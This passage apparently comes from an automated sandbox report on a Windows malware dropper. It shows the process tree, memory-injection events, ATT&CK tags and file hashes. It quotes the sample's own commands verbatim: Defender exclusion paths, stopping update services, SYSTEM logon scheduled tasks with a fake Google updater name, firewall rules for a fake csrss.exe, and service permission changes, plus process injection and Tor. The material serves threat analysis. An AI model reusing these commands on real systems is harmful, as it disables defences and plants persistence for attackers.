Token: SeIncBasePriorityPrivilege 224 powershell.exe Token: SeCreatePagefilePrivilege 224 powershell.exe Token: SeBackupPrivilege 224 powershell.exe Token: SeRestorePrivilege 224 powershell.exe Token: SeShutdownPrivilege 224 powershell.exe Token: SeDebugPrivilege 224 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2320 Broom.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3832 wrote to memory of 4896 3832 9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9.exe 71 PID 3832 wrote to memory of 4896 3832 9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9.exe 71 PID 3832 wrote to memory of 4896 3832 9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9.exe 71 PID 4896 wrote to memory of 3484 4896 Vn4fk12.exe 72 PID 4896 wrote to memory of 3484 4896 Vn4fk12.exe 72 PID 4896 wrote to memory of 3484 4896 Vn4fk12.exe 72 PID 3484 wrote to memory of 3908 3484 eq3St12.exe 73 PID 3484 wrote to memory of 3908 3484 eq3St12.exe 73 PID 3484 wrote to memory of 3908 3484 eq3St12.exe 73 PID 3908 wrote to memory of 2712 3908 2ej3685.exe 75 PID 3908 wrote to memory of 2712 3908 2ej3685.exe 75 PID 3908 wrote to memory of 2712 3908 2ej3685.exe 75 PID 3908 wrote to memory of 3948 3908 2ej3685.exe 76 PID 3908 wrote to memory of 3948 3908 2ej3685.exe 76 PID 3908 wrote to memory of 3948 3908 2ej3685.exe 76 PID 3908 wrote to memory of 3948 3908 2ej3685.exe 76 PID 3908 wrote to memory of 3948 3908 2ej3685.exe 76 PID 3908 wrote to memory of 3948 3908 2ej3685.exe 76 PID 3908 wrote to memory of 3948 3908 2ej3685.exe 76 PID 3908 wrote to memory of 3948 3908 2ej3685.exe 76 PID 3484 wrote to memory of 1708 3484 eq3St12.exe 77 PID 3484 wrote to memory of 1708 3484 eq3St12.exe 77 PID 3484 wrote to memory of 1708 3484 eq3St12.exe 77 PID 1708 wrote to memory of 4848 1708 4Fh495aL.exe 79 PID 1708 wrote to memory of 4848 1708 4Fh495aL.exe 79 PID 1708 wrote to memory of 4848 1708 4Fh495aL.exe 79 PID 1708 wrote to memory of 5036 1708 4Fh495aL.exe 80 PID 1708 wrote to memory of 5036 1708 4Fh495aL.exe 80 PID 1708 wrote to memory of 5036 1708 4Fh495aL.exe 80 PID 1708 wrote to memory of 3896 1708 4Fh495aL.exe 81 PID 1708 wrote to memory of 3896 1708 4Fh495aL.exe 81 PID 1708 wrote to memory of 3896 1708 4Fh495aL.exe 81 PID 1708 wrote to memory of 3896 1708 4Fh495aL.exe 81 PID 1708 wrote to memory of 3896 1708 4Fh495aL.exe 81 PID 1708 wrote to memory of 3896 1708 4Fh495aL.exe 81 PID 1708 wrote to memory of 3896 1708 4Fh495aL.exe 81 PID 1708 wrote to memory of 3896 1708 4Fh495aL.exe 81 PID 1708 wrote to memory of 3896 1708 4Fh495aL.exe 81 PID 1708 wrote to memory of 3896 1708 4Fh495aL.exe 81 PID 4896 wrote to memory of 712 4896 Vn4fk12.exe 82 PID 4896 wrote to memory of 712 4896 Vn4fk12.exe 82 PID 4896 wrote to memory of 712 4896 Vn4fk12.exe 82 PID 3832 wrote to memory of 2812 3832 9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9.exe 83 PID 3832 wrote to memory of 2812 3832 9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9.exe 83 PID 3832 wrote to memory of 2812 3832 9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9.exe 83 PID 3244 wrote to memory of 432 3244 Explorer.EXE 84 PID 3244 wrote to memory of 432 3244 Explorer.EXE 84 PID 3244 wrote to memory of 432 3244 Explorer.EXE 84 PID 3244 wrote to memory of 2576 3244 Explorer.EXE 86 PID 3244 wrote to memory of 2576 3244 Explorer.EXE 86 PID 3244 wrote to memory of 2576 3244 Explorer.EXE 86 PID 3244 wrote to memory of 4620 3244 Explorer.EXE 87 PID 3244 wrote to memory of 4620 3244 Explorer.EXE 87 PID 3244 wrote to memory of 4620 3244 Explorer.EXE 87 PID 3244 wrote to memory of 4428 3244 Explorer.EXE 89 PID 3244 wrote to memory of 4428 3244 Explorer.EXE 89 PID 3244 wrote to memory of 4428 3244 Explorer.EXE 89 PID 432 wrote to memory of 196 432 1911.exe 91 PID 432 wrote to memory of 196 432 1911.exe 91 PID 432 wrote to memory of 196 432 1911.exe 91 PID 432 wrote to memory of 2764 432 1911.exe 92 PID 432 wrote to memory of 2764 432 1911.exe 92 PID 432 wrote to memory of 2764 432 1911.exe 92 PID 432 wrote to memory of 4876 432 1911.exe 94 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Users\Admin\AppData\Local\Temp\9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9.exe"C:\Users\Admin\AppData\Local\Temp\9e3278cebd97cbe59695927e2c70950ad382a977b167599081986e355cc5e7f9.exe"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Vn4fk12.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Vn4fk12.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\eq3St12.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\eq3St12.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2ej3685.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2ej3685.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:2712
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:3948
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Fh495aL.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Fh495aL.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:4848
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:5036
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:3896
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Sb7qh5.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Sb7qh5.exe4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:712
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6qR7eS6.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6qR7eS6.exe3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
-
C:\Users\Admin\AppData\Local\Temp\1911.exeC:\Users\Admin\AppData\Local\Temp\1911.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"3⤵
- Executes dropped EXE
PID:196 -
C:\Users\Admin\AppData\Local\Temp\Broom.exeC:\Users\Admin\AppData\Local\Temp\Broom.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2320
-
-
-
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2764 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4472
-
-
-
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3100
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:4628
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:3224
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:528
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2536
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
PID:820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Modifies data under HKEY_USERS
PID:4652
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:4820
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:4832
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:3636
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:1400
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵PID:4648
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:1040
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵PID:2072
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:3988
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:4804
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵PID:2000
-
C:\Windows\SysWOW64\sc.exesc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
PID:4620
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:1536
-
-
-
C:\Users\Admin\AppData\Local\Temp\1AF6.exeC:\Users\Admin\AppData\Local\Temp\1AF6.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Users\Admin\AppData\Local\Temp\1CFB.exeC:\Users\Admin\AppData\Local\Temp\1CFB.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
C:\Users\Admin\AppData\Local\Temp\2316.exeC:\Users\Admin\AppData\Local\Temp\2316.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Users\Admin\AppData\Local\Temp\96A2.exeC:\Users\Admin\AppData\Local\Temp\96A2.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4184 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"3⤵PID:3748
-
-
-
C:\Users\Admin\AppData\Local\Temp\9A1D.exeC:\Users\Admin\AppData\Local\Temp\9A1D.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:524 -
C:\Users\Admin\AppData\Local\Temp\9A1D.exeC:\Users\Admin\AppData\Local\Temp\9A1D.exe3⤵
- Executes dropped EXE
PID:3560
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:652
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2764
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1728
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4516
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3032
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1664
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:520
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4556
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4420
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:96
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:1824
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3300
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:3156
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4232
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:5020
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:304
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2952
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:344
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2076
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1660
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:1468
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2216
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4092
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:5080
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:2820
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Executes dropped EXE
PID:4628
-
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"1⤵PID:4424
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:4836
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD5bae29e49e8190bfbbf0d77ffab8de59d
SHA14a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA5129e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
-
Filesize
1KB
MD5c59f53fdcc8060e77447ed9ebf9dc926
SHA10f1d44782f283b315a2ad6fe37727bdc188ea21c
SHA256cf0159b7d6cca6fe61a234db3b0902459af8a6af8b9f3e5d5c52bbb4231cd44d
SHA5121e504b99e4bc4dbf23b7545bfb2101f51ef81558eeacac41e1c9192ecf81e6017a72e89e273023df5bd806ae71ced6cef5c0f00cf91974e75a208638bfe07f20
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
1KB
MD598344d3062a964179509879a8f80d014
SHA1020c93b828da9425c2c8ff596482b1ecd3bbf143
SHA2567ee222b0681b15039a3f1e888547c02859baa0e0f304c3dd1063e911e3e94b42
SHA5125e6e9a825718f5e32b34ca86f9b132ffe034185142a68a0ce313438312c49e7e2392fa78ca4508458a401d3891cfd5917e8906b3f6830bb543465b33a8755223
-
Filesize
12.6MB
MD5275dfcec52cbf0642e80f905a0536755
SHA1a67b08da2800526861668b5869280905a08d7adb
SHA2567eeec8c77dae7ae63692da71d01d9299d0c3a3453abc0ee85b72e52a338d560d
SHA5125e293cb649f74cb34fccb0effce9093510ca0632fa551aefb1c3351026d6c8b362cc749a9f6e7fd5d53381b8e86f2518bbdda32d63261436693a141969e294e5
-
Filesize
12.6MB
MD5275dfcec52cbf0642e80f905a0536755
SHA1a67b08da2800526861668b5869280905a08d7adb
SHA2567eeec8c77dae7ae63692da71d01d9299d0c3a3453abc0ee85b72e52a338d560d
SHA5125e293cb649f74cb34fccb0effce9093510ca0632fa551aefb1c3351026d6c8b362cc749a9f6e7fd5d53381b8e86f2518bbdda32d63261436693a141969e294e5
-
Filesize
95KB
MD5a2687e610dad6bcf4359bf2a5953e10a
SHA18320fd92e757ab42f8429a9e3b43dec909add268
SHA256439cc980ba48e5f62a043f0e923221e90a58bb20812b48569a223a562ade571a
SHA512b16e6a6453ae5d18461aba546436f038070a4708116c0079cae27c9a9113efe61a750b8547f2911615cd07b350b9d857c474c4b3407093aec40ada71b2e76adf
-
Filesize
95KB
MD5a2687e610dad6bcf4359bf2a5953e10a
SHA18320fd92e757ab42f8429a9e3b43dec909add268
SHA256439cc980ba48e5f62a043f0e923221e90a58bb20812b48569a223a562ade571a
SHA512b16e6a6453ae5d18461aba546436f038070a4708116c0079cae27c9a9113efe61a750b8547f2911615cd07b350b9d857c474c4b3407093aec40ada71b2e76adf
-
Filesize
277KB
MD51c3eced439962f3570f523d9af5fb908
SHA14bf23ad43ee572abd2c85418939793ffbcd444d3
SHA2567acf0eba2165fcdfc72338959e9add02c362918c8451a0313c4ef797ae337abd
SHA512bc4d4fc365609bcc1b112e9c09bc9c7c7b9ac523120cc4f997e98639a22ff0ac3860ccae067e558e067c36da18e445fc3c724622e1891dd2f5a61a05ac96ac37
-
Filesize
277KB
MD51c3eced439962f3570f523d9af5fb908
SHA14bf23ad43ee572abd2c85418939793ffbcd444d3
SHA2567acf0eba2165fcdfc72338959e9add02c362918c8451a0313c4ef797ae337abd
SHA512bc4d4fc365609bcc1b112e9c09bc9c7c7b9ac523120cc4f997e98639a22ff0ac3860ccae067e558e067c36da18e445fc3c724622e1891dd2f5a61a05ac96ac37
-
Filesize
443KB
MD5ff4691f6c1f0e701303c2b135345890e
SHA183aa8ee0cc57af54ebab336c70d756a5a8c2f7d4
SHA25606cf4c8c1b6aa436dfff3ec427dbe4ae291d170a0ad7445003995bbf6ccb21ca
SHA5127a909dc95f019fb60da7751a888d11cb82f751560408cd47a7fdab53f92971690df5d9e8cddc9cd7cfa7c5949ff789683183c2271c5249403aa8322cfa1bcee6
-
Filesize
443KB
MD5ff4691f6c1f0e701303c2b135345890e
SHA183aa8ee0cc57af54ebab336c70d756a5a8c2f7d4
SHA25606cf4c8c1b6aa436dfff3ec427dbe4ae291d170a0ad7445003995bbf6ccb21ca
SHA5127a909dc95f019fb60da7751a888d11cb82f751560408cd47a7fdab53f92971690df5d9e8cddc9cd7cfa7c5949ff789683183c2271c5249403aa8322cfa1bcee6
-
Filesize
17.5MB
MD5d6a28fab04acec60305a5c6be5b105d2
SHA18def206af9e2e8f463f15a2874b53c295fd28710
SHA256ff8973e265cde0ecfc91cb81ae4af75946b2cfcaa772b5cd1390c176e788175f
SHA5123406ec32344b3ffedc6295d10256920cb43dd511500473974400a3602b1b9d734b9a2439cc65dde64c7fae00cbe084812b3188cde78a7c8d75650ef8690a0212
-
Filesize
17.5MB
MD5d6a28fab04acec60305a5c6be5b105d2
SHA18def206af9e2e8f463f15a2874b53c295fd28710
SHA256ff8973e265cde0ecfc91cb81ae4af75946b2cfcaa772b5cd1390c176e788175f
SHA5123406ec32344b3ffedc6295d10256920cb43dd511500473974400a3602b1b9d734b9a2439cc65dde64c7fae00cbe084812b3188cde78a7c8d75650ef8690a0212
-
Filesize
1.0MB
MD51ed9f9bb8c6f1d5c482b4bbf61cf8ee8
SHA1945b9bba996c54233daa15be3349441286b040cb
SHA25604f692202efaca511b15aefa33daf5bea9287c8e8947fb62e92d3825e5ec04ae
SHA512403a23e5923cee4c7ed48ef296737cedf4e265a77ad0b435aa6290e90a75c3d9268247f8af430027a903ebcb1dcb6c21cb573968ba06185dc1cd2e0a6121f6a4
-
Filesize
1.0MB
MD51ed9f9bb8c6f1d5c482b4bbf61cf8ee8
SHA1945b9bba996c54233daa15be3349441286b040cb
SHA25604f692202efaca511b15aefa33daf5bea9287c8e8947fb62e92d3825e5ec04ae
SHA512403a23e5923cee4c7ed48ef296737cedf4e265a77ad0b435aa6290e90a75c3d9268247f8af430027a903ebcb1dcb6c21cb573968ba06185dc1cd2e0a6121f6a4
-
Filesize
1.0MB
MD51ed9f9bb8c6f1d5c482b4bbf61cf8ee8
SHA1945b9bba996c54233daa15be3349441286b040cb
SHA25604f692202efaca511b15aefa33daf5bea9287c8e8947fb62e92d3825e5ec04ae
SHA512403a23e5923cee4c7ed48ef296737cedf4e265a77ad0b435aa6290e90a75c3d9268247f8af430027a903ebcb1dcb6c21cb573968ba06185dc1cd2e0a6121f6a4
-
Filesize
5.3MB
MD500e93456aa5bcf9f60f84b0c0760a212
SHA16096890893116e75bd46fea0b8c3921ceb33f57d
SHA256ff3025f9cf19323c5972d14f00f01296d6d7a71547eca7e4016bfd0e1f27b504
SHA512abd2be819c7d93bd6097155cf84eaf803e3133a7e0ca71f9d9cbc3c65e4e4a26415d2523a36adafdd19b0751e25ea1a99b8d060cad61cdfd1f79adf9cd4b4eca
-
Filesize
189KB
MD5f4af3a9bb5b128ea7f4a49016ae8de1f
SHA177e47932af41b3af5bfff73d2a4c9773dc224f0d
SHA256195fa6ff08dd55ff8f112c0323885bc06e1d28ce38edae26cce1e33b23337ff1
SHA5121067017da68040e8e1eab228773c37cba180731f8792462d94e1e52cc12eb63e5306b3ffbc1fb4f0047a9d29e8a060649b5914bb25ece9c2c37b75e143c50df2
-
Filesize
189KB
MD5f4af3a9bb5b128ea7f4a49016ae8de1f
SHA177e47932af41b3af5bfff73d2a4c9773dc224f0d
SHA256195fa6ff08dd55ff8f112c0323885bc06e1d28ce38edae26cce1e33b23337ff1
SHA5121067017da68040e8e1eab228773c37cba180731f8792462d94e1e52cc12eb63e5306b3ffbc1fb4f0047a9d29e8a060649b5914bb25ece9c2c37b75e143c50df2
-
Filesize
1.2MB
MD5c42d8b074bea6be54ca45b27bdf26aab
SHA105e8db08fb2cf46d41716616206774936572fb97
